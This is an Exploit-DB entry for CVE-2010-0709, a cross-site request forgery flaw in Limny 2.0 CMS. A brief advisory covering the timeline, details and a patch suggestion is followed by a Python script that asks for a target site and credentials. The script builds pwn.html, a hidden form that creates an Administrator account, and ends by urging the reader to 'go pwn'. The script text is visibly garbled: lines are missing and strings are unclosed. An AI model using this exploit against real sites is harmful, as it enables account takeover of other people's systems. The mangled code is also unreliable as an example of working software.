Limny 2.0 - Create Admin User CSRF Exploit

ID EDB-ID:11478
Type exploitdb
Reporter Luis Santana
Modified 2010-02-16T00:00:00


Limny v2.0 Create Admin User CSRF Exploit. CVE-2010-0709. Webapps exploit for php platform

:Limny 2.0 CSRF               :  
/Discovered By:              \ 
|Luis Santana                 |

The Limny 2.0 CMS is vulnerable to a Cross-Site-Request Forgery exploit which allows for a malicious attacker to create their own administrator user.

Product Information
Product/Script: Limny CMS
Affected Version: 2.0

Vulnerability Type: CSRF
Security Risk: High

Vendor URL:
Product/Script Demo:

Vendor Status: Informed
Patch/Fix Status:
Advisory Timeline: 02/15/10 : Vulnerability found, PoC created and vendor contacted
		              Update: Vendor has started working on patch.
                              Update: Vendor has created a Patch.

Advisory URL:

Product Description
Limny is a powerful, module-based and lightweight CMS. It is programmed in PHP and uses MySQL database. 

Vulnerability Details
By crafting a simple hidden form webpage with a simple javascript form auto-submitter hidden inside of an iframe an attacker is able to add their own administrator privilleged user.

Proof of Concept
See included .zip file for unweaponized (you need to click the "Save" button for the exploit to launch) PoC

Patch/Fix Suggestion(s)
Implementing form cookies and checking for HTTP Referer would provide an adequate means of patching this vulnerability.

Security Risk
This vulnerability is estimated to have a HIGH security risk.

The Author and Researcher of this Advisory is Luis Santana of the HackTalk Security Team

Limny 2.0 CSRF Exploit
Discovered By: Luis Santana
Script By: Luis Santana

Shoutz to the community, Shardy, Rage, Xires and Stacy

__version__= 1.0

p = open("pwn.html", "w")
<title>Limny2.0 CSRF by Luis Santana
<h1>Press Save and Pwn Away</h1>
base = str(input("What is the target website? "))
p.write('<form name="adduser" action="')
p.write('''/limny/?q=admin/modules/user/new" method="post" enctype="multipart/form-data">
username = str(input("What username do you want? "))
email = str(input("What email (can be fake) do you want? "))
password = str(input("What password do you want? "))
p.write('''<input name="user" type="hidden"  value="''')
p.write('" /></td>')
p.write('<td><input name="email" type="hidden" value="')
p.write('<td><input name="pass" type="hidden"  value="')
p.write('<td><input name="confirmpass" type="hidden" value="')
p.write('''<td><select name="language"><option value="english" selected="selected">English</option></select></td>
<td><select name="usergroup"><option value="1">Administrator</option><option value="2">Moderator</option><option value="3" selected="selected">Administrator</option></select></td></tr>
<td><input name=""picture" type="file" value="" /></td></tr><tr><td colspan="2"><button name="submit" type="submit">Save</button></td></tr></table></form>
print("pwn.html has been created successfully! Upload this file to your webserver and then go pwn")